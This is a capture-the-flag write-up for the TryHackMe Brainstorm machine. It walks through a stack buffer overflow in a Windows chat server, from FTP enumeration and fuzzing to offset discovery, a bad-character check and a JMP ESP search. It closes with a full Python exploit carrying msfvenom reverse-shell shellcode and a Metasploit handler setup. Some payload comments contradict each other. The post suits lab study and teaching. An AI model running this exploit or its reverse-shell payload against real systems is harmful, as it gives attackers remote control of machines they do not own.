BrainStrom TryHackme
Reverse engineer a chat program and write a script to exploit a Windows machine.
✅ Information Gathering
Rust scan open port enumeration
so we have found three open port
- 21 FTP
- 3389 RDP
- 9999 abyss server (custom)
Let's first try to enumerate the FTP port
✅ Port 21 FTP
As you can see I got access to FTP with an anonymous username and password, where I found two interesting files
- chatserver.exe
- essfunc.dll
so I downloaded both of them to my machine using the get command in FTP.
✅ Port 9999
I was not really sure what this port does, but most probably it would be the chat server that is running. let's check it out by connecting it using NC binary
and yes, it is the chat server that is running, it asks for the username and the message you want to send.
since this is Buffer Overflow-based machine, there is the possibility that this chat server is vulnerable to Buffer Overflow, let's try to exploit and check it out
as you can see above I have sent a bunch of A’s as usernames and a bunch of A’s as messages.
the chat server restricts the length of the username to a max of 20 characters, but there is no restriction to message length
let's try to reverse engineer the program
we already have the chatserver.exe and its DLL file which is required by chatserver.exe to reverse engineer.
✅ Reversing chatserver.exe for buffer overflow
prerequisites :
- window VM
- immunity debugger installed on windows VM
- mona python script configured with immunity debugger
open chatserver.exe with immunity debugger, for the first time when you will start the binary in immunity debugger, windows firewall will ask connection allow or deny. just allow it.
Click on the play button in the immunity debugger to start the binary, once it is started, let's try to see if the application crashes, and if we sent a bunch of A’s.
✅Fuzzing
first configure mona’s current working directory, so that we can easily work on it like so :!mona config -set workingfolder c:\mona\%p
we can generate a bunch of A’s with help of python and send it via python by manually copying and pasting it into the message.
python -c 'print("test\r\n"+"A"*3000)| nc 10.0.2.8 9999
and yes, it indeed crashes the application I have sent around 3000 A’s, which verifies that the application is vulnerable to Buffer Overflow.
✅ Finding offset
For finding offset, we will be going to we will first gonna create the cyclic pattern. we can create that pattern either with pwn-tools or with Metasploit. I will be using Metasploit
/usr/bin/msf-pattern_create -l 3000
now I will send this pattern as a message to the chatserver.exe program
now the application will crash, and we will have to note down the value of EIP register
So the value of the EIP Register is: 31704330
now using the above EIP value we will find the offset, with help of
/usr/bin/msf-pattern_offset -l 3000 -q 31704330
✅ Finding bad character
first, create all characters in hex with mona like so :
!mona bytearray -b "\x00"
we have created all chracter except \x00 as it it universal bad character
it can be found at the location C:\mona\brainpan\bytearray.txt
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"or we can also create all characters with python also like so :
all_char=""
for x in range(1, 256):
all_char+="\\x" + "{:02x}".format(x)
print(all_char)or we can also use the bad chars pip module pip install badchars
and generate all_chracter hex code like so : badchars -f python
✅ Creating Buffer Overflow Script :
#!/bin/pythonimport sys
import socket
import struct
offset=2012all_char=b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'buffer= b"A"*offset+b"BBBB"+all_chartry:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.2.8",9999))
s.send((b"testuser"+b"\r\n"))
s.recv(1024)
s.send((buffer+b"\r\n"))
s.recv(1024)
s.close()except:
print("error")
sys.exit()
after executing the script above the program crashed, now we could potentially find the bad character, by comparing all characters generated by mona previously.
as you can see the program is crashed, now we have an EIP(instruction pointer) value of 42424242 (which is B as set in the above script) and we have an ESP(Stack Pointer) value of 00A6EEA8
now we can use mona to find the bad character like so :
!mona compare -f C:\mona\brainpan\bytearray.bin -a <ESP_ADDRESS>as you can see we got the result :
which says unmodified, means there is no bad character, only there was one \x00 , which is universal bad character.
✅ Finding jump statement/return address
we can find it with mona like so :
!mona jmp -r esp -cpb "ALL_BAD_CHAR"
so after executing the command above we got only one return/jump statement :
so after executing the command above we got few return/jump statement, so we will have to use the addresses, which has the least memory security implementation, seems the first one would work fine which is 0x625014DF
also now in order to use this address, you will need to convert it from little-endian (based on os). we can do so with the python struct function :
def p32(data):
return struct.pack('<I',data)p32(0x<RETURN_ADDRESS>)✅ Adding NOPs and SHELLCODE Injection
adding NOPs
now when we will going to jump the new EIP, where our shellcode will reside, it will take some space to open up the shell, so for safety, will going to add NOPs which basically means no operation, just do nothing (\x90). we can add some number of NOPs multiple of 8 (as the memory address of 8 bits)
b'\x90'*16
✅ Generate shellcode
we can generate shellcode with Metasploit with the following command :
msfvenom -p windows/shell/reverse_tcp LHOST=10.0.2.23 LPORT=4444 -b "\x00" -f py -v shellcodeI am going to use a general reverse shell !!
now just add these two things (NOPs and shellcode ) to our buffer
✅ Final Buffer overflow script :
#!/bin/pythonimport sys
import socket
import structdef p32(data):
return struct.pack('<I',data)# bad_char=b"\x00"offset=2012jmp_esp=p32(0x625014DF)nop_sled=b"\x90"*16buffer= b"A"*offset+b"BBBB"#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.23 LPORT=4444 -b "\x00" -f py -v shellcodeshellcode = b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x92\x4b\x4e"
shellcode += b"\xa0\xc3\x08\xa5\x3a\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x6e\x03\xcd\x44\x33"
shellcode += b"\xe0\x69\x3a\x92\x4b\x0f\xf1\x82\x58\xf7\x6b"
shellcode += b"\xda\x7a\x9c\xc5\x8b\x83\xf7\x5a\xc4\x03\xc5"
shellcode += b"\xf2\xdb\x40\x2e\x68\xb2\x06\x7f\x69\x8b\x07"
shellcode += b"\x12\x70\xd8\x03\xc5\xd2\x93\x40\x94\xfa\x3e"
shellcode += b"\x77\x2f\xdc\xc1\x24\x85\x7b\x53\x82\x43\xe1"
shellcode += b"\xc2\xc9\x47\xd7\xc0\x03\xc5\xf2\xe3\x83\xe7"
shellcode += b"\x06\xda\x4a\x9e\xe1\x92\x6e\x24\x42\x8a\x40"
shellcode += b"\x4c\xaf\x46\x7a\xa5\x3a\x92\xc0\xce\x28\xc3"
shellcode += b"\x08\xa5\x72\x17\x8b\x3a\xc7\x8b\x09\x75\xb1"
shellcode += b"\xda\x53\x0a\x2b\x83\x28\xf5\x73\x93\x9b\xad"
shellcode += b"\xf6\x8b\xf7\x6c\x7b\x19\x7f\xc6\xed\xf2\xc1"
shellcode += b"\xed\x3b\x44\x03\x7f\x60\x6f\x49\x64\xf3\x9f"
shellcode += b"\x0a\x4f\x61\xfb\xe8\xd0\xcb\xde\x48\x02\x84"
shellcode += b"\xcb\x4d\x9c\xeb\xe7\x93\x16\xe4\x48\x48\x81"
shellcode += b"\x73\x93\x9b\x28\xe1\x48\x04\xed\x7e\x19\x0b"
shellcode += b"\x52\xe9\xc2\xd8\xe4\xb1\x96\xc3\x0f\xf8\x82"
shellcode += b"\x50\xfb\x63\xda\x4a\x9e\xfa\x82\x50\xe4\x63"
shellcode += b"\xd3\x11\x06\x23\x2f\x28\xe4\x68\x6d\xab\x16"
shellcode += b"\xe1\x9a\x52\xed\xb1\x80\xa2\x05\x5f\x3c\xf7"
shellcode += b"\xf8\x73\x2c\x3c\x3d\x92\x9c\x3b\x97\x3a\x92"
shellcode += b"\x0a\x18\xe9\x4a\xee\xed\xbb\x7e\xeb\x4f\xa0"
shellcode += b"\xc3\x41\x2c\xdf\xdb\xf7\x4c\xa0\xd2\x54\xaf"
shellcode += b"\x3a\x90\x5c\x0f\xf4\x8a\x81\x41\x76\x1b\xba"
shellcode += b"\x0f\x1a\x8f\x7f\x83\x3d\x6d\x9e\x02\x29\x29"
shellcode += b"\x60\xa4\x3b\x92\x4b\x17\xe1\x79\x21\x25\x51"
shellcode += b"\x92\xb4\x9b\xca\xc9\x49\xfb\x6a\xc2\x06\x7f"
shellcode += b"\x69\x8e\x39\x65\x72\x6d\x8b\x06\x29\x01\x40"
shellcode += b"\x5a\xfa\xda\xc2\x8f\xe1\x79\xe2\xaa\xe5\x72"
shellcode += b"\xb4\x9b\xe8\x4a\xcf\xcf\x2a\xd3\x13\x02\x29"
shellcode += b"\x21\x40\x2c\xc3\xd3\xf1\xd7\x05\xb7\x69\x5a"
shellcode += b"\xef\x17\x8b\x3a\xaa\x8a\xf7\x6b\x4f\x77\xa3"
shellcode += b"\xdd\xa0\xc3\x08\xed\xb9\x7e\x5b\x06\x29\x21"
shellcode += b"\x45\x94\xf3\xf8\x4f\x0f\xf8\x8b\x81\x5c\x7b"
shellcode += b"\x28\x49\x97\x68\x9c\xf7\x70\xb9\x6a\x4b\x30"
shellcode += b"\xf5\x8b\x8b\x61\x1a\xcc\xc2\xb8\xca\x83\x49"
shellcode += b"\xfc\x52\x92\x5b\x4e\xa0\x82\x50\xed\xb3\x60"
shellcode += b"\x03\x7f\x69\x82\xb2\xfd\x9e\xc1\xae\xb1\x75"
shellcode += b"\x8b\x81\x66\x73\x1b\x8c\x03\x91\x0a\x41\x2c"
shellcode += b"\xca\xda\xc2\x94\xe8\x4a\xf1\xe4\x80\x90\x92"
shellcode += b"\x86\xff\x3c\xdd\x26\xc2\x92\x36\x66\xf8\x82"
shellcode += b"\x5f\xfc\x52\x92\x0b\x4e\xa0\x82\x50\xcf\x3a"
shellcode += b"\xc8\x0a\xf4\xab\xec\x07\x95\xc5\x47\x1c\x17"
shellcode += b"\xe1\x79\x7d\xcb\x77\xf3\xb4\x9b\xe9\x3c\xc6"
shellcode += b"\x4c\x06\x6d\xb4\xb1\xe8\xc2\xcb\xed\x13\x54"
shellcode += b"\x03\xcb\x56\xb6\xbc\xe4\xc5\x75\x13\x24\xa0"
shellcode += b"\x9a\x41\x62\xf8\x62\xfe\xec\xf6\x3c\xdd\xa5"
shellcode += b"\x3a"buffer = b"A"*offset+jmp_esp+nop_sled+shellcodetry: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.2.8",9999)) s.send((b"testuser"+b"\r\n")) s.recv(1024) s.send((buffer+b"\r\n")) s.recv(1024) s.close()except: print("error") sys.exit()
✅ Exploitation
open reverse shell handler with Metasploitexploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost eth0set lport 4444
and listen for reverse connection after executing the above script !!
and finally, we got the reverse shell. now we can finally find our root.txt file
THANK YOU FOR READING MY WRITE-UP!! 👊👊
please support me by following me on medium and other social platforms:
you guys can subscribe to me 🙌on YouTube: I post walkthroughs and other ethical hacking-related videos there.
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!
